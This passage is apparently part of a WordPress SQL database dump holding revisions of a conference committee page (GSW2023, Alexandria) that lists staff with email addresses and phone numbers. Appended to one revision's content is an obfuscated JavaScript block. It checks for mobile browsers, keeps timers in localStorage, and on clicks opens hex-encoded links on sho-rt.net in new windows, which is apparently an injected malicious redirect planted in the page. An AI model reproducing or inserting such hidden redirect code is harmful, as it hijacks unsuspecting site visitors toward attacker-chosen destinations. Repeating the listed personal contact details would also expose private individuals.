src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><img class=\"img_card_1 alignnone wp-image-5159\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/dr-radwa-267x300.jpg\" alt=\"\" width=\"133\" height=\"150\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span>\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\n</tr>\n</tbody>\n</table>\n[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\n<h3 style=\"font-weight: 400; text-align: center;\"><strong>IT Affairs</strong></h3>\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Research Eng. Ayman Elzagh</strong></em></span>\n<span style=\"font-size: 12pt;\">Web Director\nGSW2023, Egypt\n<span style=\"font-size: 11pt;\"><a href=\"mailto:ayzagh@aast.edu\">ayzagh@aast.edu</a></span>\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201210007979\">+201210007979</a></span></span></td>\n</tr>\n</tbody>\n</table>\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/09/IMG-20230905-WA0015.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Mohamed ElQurashi</strong></em></span>\n<span style=\"font-size: 12pt;\">Systen Admin</span>\n<span style=\"font-size: 12pt;\">m.elqurashi@aast.edu</span>\n<span style=\"font-size: 12pt;\">+201003348433</span></td>\n</tr>\n</tbody>\n</table>\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\n<span style=\"font-size: 12pt;\">Systen Admin</span>\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span>\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\n</tr>\n</tbody>\n</table>\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong>\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span>\nDirector of Events and conferences Department\nArab Academy for Science, Technology and Maritime Transport\nP.O.Box 1029, Alexandria, Egypt\n<table>\n<tbody>\n<tr>\n<td>Email:</td>\n<td>yasserelrashidi@aast.edu</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201270059999</td>\n</tr>\n</tbody>\n</table>\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span>\nLocal financial Director, GSW2023, Egypt\nArab Academy for Science, Technology and Maritime Transport\nP.O.Box 1029, Alexandria, Egypt\n<table>\n<tbody>\n<tr>\n<td>Email:</td>\n<td>mohamed_abdallah20102002@yahoo.com</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201141401861</td>\n</tr>\n</tbody>\n</table>\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-autosave-v1','','','2023-09-06 06:19:47','2023-09-06 06:19:47','',4849,'https://gsw2023.com/?p=5158',0,'revision','',0),
(5159,1,'2023-08-13 20:06:37','2023-08-13 20:06:37','','dr radwa','','inherit','open','closed','','dr-radwa','','','2023-08-13 20:06:37','2023-08-13 20:06:37','',4849,'https://gsw2023.com/wp-content/uploads/2023/08/dr-radwa.jpg',0,'attachment','image/jpeg',0),
(5160,1,'2023-08-13 20:08:10','2023-08-13 20:08:10','','zaki','','inherit','open','closed','','zaki','','','2023-08-13 20:08:10','2023-08-13 20:08:10','',4849,'https://gsw2023.com/wp-content/uploads/2023/08/zaki.jpg',0,'attachment','image/jpeg',0),
(5161,1,'2023-08-13 20:08:51','2023-08-13 20:08:51','[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\r\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\r\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"alignnone  wp-image-5160\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/zaki-212x300.jpg\" alt=\"\" width=\"108\" height=\"153\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"alignnone  wp-image-5159\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/dr-radwa-267x300.jpg\" alt=\"\" width=\"115\" height=\"129\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><strong>IT Affairs</strong></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Research Eng. Ayman Elzagh</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Web Director\r\nGSW2023, Egypt\r\n<span style=\"font-size: 11pt;\"><a href=\"mailto:ayzagh@aast.edu\">ayzagh@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201210007979\">+201210007979</a></span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span>\r\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span>\r\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" 